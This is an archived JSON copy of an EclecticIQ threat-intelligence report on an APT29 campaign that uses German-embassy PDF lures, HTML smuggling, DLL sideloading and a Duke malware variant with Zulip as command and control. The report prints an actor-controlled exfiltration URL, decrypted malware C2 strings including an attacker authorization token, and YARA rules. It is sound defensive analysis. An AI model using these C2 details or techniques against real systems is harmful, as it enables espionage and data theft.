{ "id": "a042ad32-08be-4c74-a55f-b92c0d52f878", "created_at": "2026-04-06T00:10:34.996506Z", "updated_at": "2026-04-10T03:37:33.236844Z", "deleted_at": null, "sha1_hash": "cad8860ce0240411bac67b9711813f84f1384da1", "title": "German Embassy Lure: Likely Part of Campaign Against NATO Aligned Ministries of Foreign Affairs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1622739, "plain_text": "German Embassy Lure: Likely Part of Campaign Against NATO\r\nAligned Ministries of Foreign Affairs\r\nArchived: 2026-04-05 14:02:38 UTC\r\nExecutive Summary\r\nEclecticIQ analysts assess with high confidence that two observed PDF documents are part of an ongoing\r\ncampaign targeting Ministries of Foreign Affairs of NATO aligned countries. The PDF files masquerade as\r\ncoming from the German embassy and contained two diplomatic invitation lures. \r\nOne of the PDFs delivered a variant of Duke - a malware that has been linked to Russian state-sponsored cyber\r\nespionage activities of APT29. The other file was very likely used for testing or reconnaissance, as it did not\r\ncontain a payload, but notified the actor if a victim opened the email attachment.  \r\nVictimology, lure documents, malware delivery and the malware itself resemble with reports that have linked the\r\ncampaign to APT29, an advanced persistent threat actor attributed to Russia's Foreign Intelligence Service (SVR).\r\nThe threat actor used Zulip - an open-source chat application - for command-and-control, to evade and hide its\r\nactivities behind legitimate web traffic. [1]\r\n \r\nMalicious PDF Document Used to Deliver HTML Smuggling \r\nEclecticIQ analysts identified two malicious PDF documents that masquerade as coming from the German\r\nembassy, and that targeted diplomatic entities with invitation lures. The documents used the following themes:\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 1 of 16\n\n“Farewell to Ambassador of Germany” and “Day of German Unity”. The first PDF contained embedded\r\nJavaScript code to deliver multi-staged payloads in HTML file format. PDF readers like Adobe Acrobat have a\r\ndefault setting that warns before execution of code inside a PDF document. Upon user execution the PDF\r\ndocument displays an “Open File” alert box (Figure 1). If a victim opens it, the code will launch the malicious\r\nHTML file called Invitation_Farewell_DE_EMB.\r\nFigure 1 - Open File alert box\r\n(click on image to open in separate tab).\r\nFigure 2 shows the German embassy invitation lure. The mailto address inside the PDF file refers to a legitimate\r\ndomain bahamas.gov.bs. Analysts observed the same domain in a report by Lab52 from mid-July. [2] Lab52\r\ninitially reported a campaign impersonating the Norwegian embassy and targeting diplomatic entities with\r\ninvitation lures.\r\nAnalysts assess with high confidence that the PDF files impersonating the German embassy, were very likely\r\ncreated by the same threat actor, due to overlaps in the victimology, and phishing themes used.\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 2 of 16\n\nFigure 2 - German embassy invitation lure.\r\nFigure 3 shows the embedded JavaScript code inside the German embassy invitation lure PDF, which was\r\ngenerated by PyPDF2. [3]\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 3 of 16\n\nFigure 3 - Embedded with Invitation_Farewell_DE_EMB.HTML.\r\nInvitation_Farewell_DE_EMB is an HTML file. Through HTML smuggling, the threat actor delivered a ZIP file\r\nthat contained a malicious HTML Application (HTA). An HTA file is a widely used Living Off The Land Binary\r\n(LOLBIN) containing both HTML and scripting code to create a standalone malicious application that is executed\r\nby the Windows HTA engine mshta.exe [4]. The zipped HTA file eventually delivers a Duke malware variant\r\n(Figure 4).\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 4 of 16\n\nFigure 4 - Delivery stages of Duke malware variant.\r\nFigure 5 shows the JavaScript code inside the Invitation_Farewell_DE_EMB.html. The URL sgrhf[.]org[.]pk/wp-content/idx[.]php?n=ks\u0026q='+btoa(p) was controlled by the threat actor to receive the execution file path by using\r\nwindow.location.pathname, which provides the username of the victim device and notifies the threat actor of\r\npossible successful attack.\r\nFigure 5 - HTML smuggling after the\r\nexecution of PDF lure document.\r\nDLL Sideloading Abused to Execute Duke Variant Malware \r\nAfter execution, the HTA file will drop the three executables into the C:\\Windows\\Tasks directory for DLL\r\nSideloading:\r\n•    AppVIsvSubsystems64.dll - A library loaded into msoev.exe to perform the execution without any failure.\r\n•    Mso.dll - Duke malware variant loaded into msoev.exe via DLL Sideloading.\r\n•    Msoev.exe - A legitimate signed Windows binary, automatically loading Mso.dll and\r\nAppVIsvSubsystems64.dll upon execution.\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 5 of 16\n\nFigure 6 – DLL Sideloading attempt into Msoev.exe. \r\nWindows API Hashing Used to Hide Import Address Table\r\nEclecticIQ analysts examined the dropped Duke malware variant (mso.dll). Analysis showed that the malware\r\nused Windows API hashing to hide the names of the Windows API function calls. The actor used this technique to\r\nperform evasion against static malware scanners.\r\nFigure 7 shows the decoded Windows libraries from ROR13 hashing algorithm: \r\n•    Kernel32.dll: 6A4ABC5B\r\n•    Ntdll.dll: 3CFA685D\r\n•    User32.dll: 63C84283\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 6 of 16\n\nFigure 7 - ROR13 hashing algorithm inside\r\ndisassembled Duke malware variant. \r\nXOR Encryption to Hide String Values\r\nAnalysts observed that all string values are encrypted by generic XOR encryption routines that are decrypted at\r\nexecution. Figure 8 shows an example of a decrypted function inside the mso.dll, which is used to open the lure\r\nInvitation.pdf. The malware uses ShellExecuteA Windows API to open the PDF lure document. String data such\r\nas Invitation.pdf is stored statically inside the malware as XOR encrypted stack string.\r\n \r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 7 of 16\n\nFigure 8 – XOR decryption function inside\r\ndisassembled Duke malware variant. \r\nFigure 9 shows the XOR decryption routine. This function performs one-time XOR decryption of the byte array\r\nand it’s using last byte of encrypted array as a key to decrypt it. \r\n \r\nFigure 9 - XOR decryption routine inside\r\ndisassembled Duke malware variant. \r\nFigure 10 shows the manual decryption of XOR encrypted stack string with hex value key “F”:  \r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 8 of 16\n\nFigure 10 – Manually decrypted stack string.\r\nZulip: Hiding C2 Communication in Legitimate Web Traffic\r\nEclecticIQ analysts observed that threat actor used Zulip servers to establish a C2 connection, and to blend with\r\nlegitimate web traffic. [2 Zulip is an open-source chat application that uses Amazon web services to receive and\r\nsend chat messages. The actor used the API features of Zulip to send victim details to an actor-controlled chat\r\nroom (toyy[.]zulipchat[.]com), and to issue malicious remote commands.\r\n  \r\nFigure 11 - C2 communications from toyy[.]zulipchat[.]com.\r\nAll of the API request headers such as URL, authorization token, and the request itself are stored encrypted inside\r\nthe Duke malware variant. The decrypted contents can be seen in Appendix A below.\r\nPivoted PDF Document Notifies Threat Actor About Success Rate\r\nPivoting on parameters in the previously identified URL - sgrhf[.]org[.]pk/wp-content/idx[.]php?\r\nn=ks\u0026q='+btoa(p)- analysts identified a second PDF file. The PDF (figure 12) used a “Day of German Unity”\r\nlure. Analysts assess with moderate confidence that the PDF document was very likely used by the threat actor for\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 9 of 16\n\nreconnaissance or for testing purposes. It did not contain a payload, but notified the actor if a victim opened the\r\nemail attachment by receiving a notification through a compromised domain edenparkweddings[.]com.\r\nFigure\r\n12 - “Day of German Unity” reception lure.\r\nAttribution\r\nEclecticIQ Analysts assess with high confidence that the identified pdf documents are part of a wider campaign\r\ntargeting diplomatic corps across the globe. Victimology, themes of the phishing lures, malware delivery and the\r\nmalware itself resemble with OSINT reports that attributed the campaign to APT29. [1 [2\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 10 of 16\n\nFigure 13 – Diamond Model of this campaign.\r\nAPT29 also known as CozyBear, The Dukes, Cloaked Ursa, Nobelium, UNC2452 is an advanced persistent threat\r\nactor (APT) active since 2008. The US and UK governments attribute APT29 to Russia's Foreign Intelligence\r\nService (SVR), which is responsible for the collection of political and economic intelligence from foreign\r\ncountries.\r\nThe Duke malware variant was first described by F-Secure [6]. EclecticIQ analysts identified code similarities\r\nbetween a sample analysed by Lab52 [5] and samples seen in the recent case. [6]\r\nAPT29 is known to abuse legitimate web services such as Microsoft OneDrive and Notion APIs to perform\r\ncommand-and-control communication (C2) in an evasive way. In this new campaign the threat actor used Zulip\r\nweb services as C2.  [4]\r\nAPT29’s primary targets are governments and government subcontractors, political organizations, research firms,\r\nand critical industries such as energy, healthcare, education, finance, and technology in the US and Europe.\r\nProtection and Mitigation Strategies\r\nConfigure intrusion detection systems (IDS) and intrusion prevention systems (IPS) or any network\r\ndefence mechanisms to alert and block suspicious network traffic going through unexpected web services.\r\nUse YARA rules provided in Appendix B to search Windows endpoints for potential Duke malware variant\r\ninfections.\r\nImplement an application allow-list policy on Windows hosts to prevent potential execution of LOLBINs\r\nlike msoev.exe.\r\nIndicator of compromise (IoC)\r\nPDF Lure:\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 11 of 16\n\nFc53c75289309ffb7f65a3513e7519eb\r\n50f57a4a4bf2c4b504954a36d48c99e7\r\nC2 Servers:\r\ntoyy[.]zulipchat[.]com\r\nsgrhf[.]org[.]pk\r\nedenparkweddings[.]com\r\nDuke Malware Variant:\r\n0be11b4f34ede748892ea49e473d82db\r\n5e1389b494edc86e17ff1783ed6b9d37\r\nd817f36361f7ac80aba95f98fe5d337d\r\nMITRE ATT\u0026CK Techniques\r\nSpearphishing Attachment - T1566.001\r\nDLL Side-Loading - T1574.002\r\nHTML Smuggling - T1027.006\r\nEmbedded Payloads - T1027.009\r\nDynamic API Resolution - T1027.007\r\nSystem Binary Proxy Execution: Mshta - T1218.005\r\nApplication Layer Protocol: Web Protocols - T1071.001\r\nUser Execution: Malicious File - T1204.002\r\nCompromise Infrastructure: Web Services - T1584.006\r\nAppendix A  \r\nList of decrypted strings.\r\nCt`dtbeP'\r\nCt`dtbeP\r\nresult\r\nsuccess\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 12 of 16\n\nsubscriptions=[{name:%d}]\u0026principals=[%d]\r\nPOST\r\napi/v1/users/me/subscriptions\r\nincipals=[%d]\r\ntype=stream\u0026to=%d\u0026topic=stream events\u0026content=hello?\r\nPOST\r\napi/v1/messages\r\ntopic=stream events\u0026content=hello?\r\nstream_id\r\nLdrLoadDll\r\ncurl/7.68.0\r\napi/v1/messages?anchor=newest\u0026num_before=1\u0026num_after=0\u0026narrow=[{operator:has,operand:attachment},\r\n{operator:stream,operand:%d}]\r\nInternetOpenA\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic\r\nZ2Ficy1ib3RAdG95eS56dWxpcGNoYXQuY29tOnhKWmY4amFxd1g1NEhXYWxpWGZtNHUyYk1XQ3pOb0x6\r\nInvitation.pdf\r\napi/v1/messages\r\nInternetReadFile\r\nHttpSendRequestA\r\nHttpOpenRequestA\r\nInternetConnectA\r\ntoyy.zulipchat.com\r\napi/v1/messages/%d\r\nInternetCloseHandle\r\napi/v1/users/me/subscriptions\r\napi/v1/get_stream_id?stream=%d\r\nsubscriptions=[{name:%d}]\u0026principals=[%d]\r\ntype=stream\u0026to=%d\u0026topic=stream events\u0026content=%s\r\ntype=stream\u0026to=%d\u0026topic=stream events\u0026content=hello?\r\nPOST\r\nopen\r\nresult\r\nDELETE\r\ncontent\r\nsuccess\r\nmessages\r\nAppendix B\r\nAPT29_Duke_Malware_Jul17 YARA rule.\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 13 of 16\n\nrule APT29_Duke_Malware_Jul17\r\n{\r\n    meta: \r\n        description = \"Detects APT29 Duke malware variant \"  \r\n        Author = \"EclecticIQ Threat Research Team\"   \r\n        creation_date = \"2023-07-30\"  \r\n        classification = \"TLP:WHITE\"\r\n        hash1 = \"0be11b4f34ede748892ea49e473d82db\"\r\n        hash2 = \"5e1389b494edc86e17ff1783ed6b9d37\"\r\n    strings:\r\n        $x1 = {48 89 4C 24 08 48 89 54 24 10 4C 89 44 24 18 4C 89 4C 24 20 48 83 EC 64 48 C7 C1}\r\n            /*\r\n0x2ac406170 80790F00                   cmp byte ptr [rcx + 0xf], 0\r\n0x2ac406174 4889C8                      mov rax, rcx\r\n0x2ac406177 751C                          jne 0x2ac406195\r\n0x2ac406179 4889CA                     mov rdx, rcx\r\n0x2ac40617c 488D490F                  lea rcx, [rcx + 0xf]\r\n0x2ac406180 440FB64010              movzx r8d, byte ptr [rax + 0x10]\r\n0x2ac406185 443002                       xor byte ptr [rdx], r8b\r\n0x2ac406188 4883C201                  add rdx, 1\r\n0x2ac40618c 4839CA                      cmp rdx, rcx\r\n0x2ac40618f 75EF                           jne 0x2ac406180\r\n0x2ac406191 C6400F01                  mov byte ptr [rax + 0xf], 1\r\n0x2ac406195 C3                              ret \r\n */\r\n  $decryption_routine = {\r\n80 79 ?? 00\r\n48 89 C8\r\n75 ??\r\n48 89 CA\r\n48 8D 49 ??\r\n44 0F B6 40 ??\r\n44 30 02\r\n48 83 C2 01\r\n48 39 CA\r\n75 ??\r\nC6 40 ?? 01\r\nC3\r\n}\r\n    condition:\r\n        uint16(0) == 0x5A4D and\r\n        $x1 or $decryption_routine and \r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 14 of 16\n\nfilesize \u003c= 2MB\r\n}\r\nAPT29_Embassy_Invitation_Lure YARA rule.\r\nrule APT29_Embassy_Invitation_Lure\r\n{\r\n    meta: \r\n        description = \"Detects APT29 Embassy Invitation Lure\"  \r\n        Author = \"EclecticIQ Threat Research Team\"   \r\n        creation_date = \"2023-07-30\"  \r\n        classification = \"TLP:WHITE\"\r\n        hash1 = \"fc53c75289309ffb7f65a3513e7519eb\"\r\n    strings:\r\n        $pdf_meta1 = {2f 54 79 70 65 20 2f 45 6d 62 65 64 64 65 64 46 69 6c 65}\r\n        $pdf_meta2 = \"q='+btoa(p)\" fullword ascii wide nocase \r\n        $x1 = {2F 50 72 6F 64 75 63 65 72 20 28 50 79 50 44 46 32 29}  \r\n        $x2 = \"Invitation\"  fullword ascii wide nocase \r\n        $x3 = \"embassy\"  fullword ascii wide nocase \r\n        $x4 = \"reception\"  fullword ascii wide nocase \r\n    condition:\r\n         ( uint32(0) == 0x46445025 or uint32(0) == 0x4450250a ) and\r\n         all of ($pdf_meta*) and any of ($x*) and\r\n         filesize \u003c= 1MB\r\n}\r\nAbout EclecticIQ Intelligence \u0026 Research Team\r\nEclecticIQ is a global provider of threat intelligence, hunting, and response technology and services.\r\nHeadquartered in Amsterdam, the EclecticIQ Intelligence \u0026 Research Team is made up of experts from Europe\r\nand the U.S. with decades of experience in cyber security and intelligence in industry and government.\r\nWe would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com.\r\nYou might also be interested in:\r\n8Base Ransomware Surge; SmugX Targeting European Governments; Russian-Linked DDoS Warning\r\nChinese Threat Actor Used Modified Cobalt Strike Variant to Attack Taiwanese Critical Infrastructure\r\nIntroducing EclecticIQ Intelligence Center 3.0\r\nReferences\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 15 of 16\n\n[1]        “mshta | LOLBAS.” https://lolbas-project.github.io/lolbas/Binaries/Mshta/ (accessed Jul. 31, 2023).\r\n[2]        “Zulip: Open-source team chat with topic-based threading,” Zulip. https://zulipchat.com/ (accessed Jul.\r\n31, 2023).\r\n[3]        “F-Secure_Dukes_Whitepaper.pdf.” Accessed: Aug. 03, 2023. [Online]. Available: https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf \r\n[4]        “APT29, IRON RITUAL, IRON HEMLOCK, NobleBaron, Dark Halo, StellarParticle, NOBELIUM,\r\nUNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke, SolarStorm, Blue Kitsune, Group G0016 | MITRE\r\nATT\u0026CK®.” https://attack.mitre.org/groups/G0016/ (accessed Jul. 31, 2023).\r\n[5]    M. Fenniak, “PyPDF2: A pure-python PDF library capable of splitting, merging, cropping, and transforming\r\nPDF files.”[6]    “mshta | LOLBAS.” https://lolbas-project.github.io/lolbas/Binaries/Mshta/ (accessed Jul. 31,\r\n2023).\r\nSource: https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs" ], "report_names": [ "german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "2ff375ef-7859-4d44-9399-06c9d1d9359c", "created_at": "2023-07-11T02:00:10.063244Z", "updated_at": "2026-04-10T02:00:03.367017Z", "deleted_at": null, "main_name": "SmugX", "aliases": [], "source_name": "MISPGALAXY:SmugX", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434234, "ts_updated_at": 1775792253, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cad8860ce0240411bac67b9711813f84f1384da1.pdf", "text": "https://archive.orkl.eu/cad8860ce0240411bac67b9711813f84f1384da1.txt", "img": "https://archive.orkl.eu/cad8860ce0240411bac67b9711813f84f1384da1.jpg" } }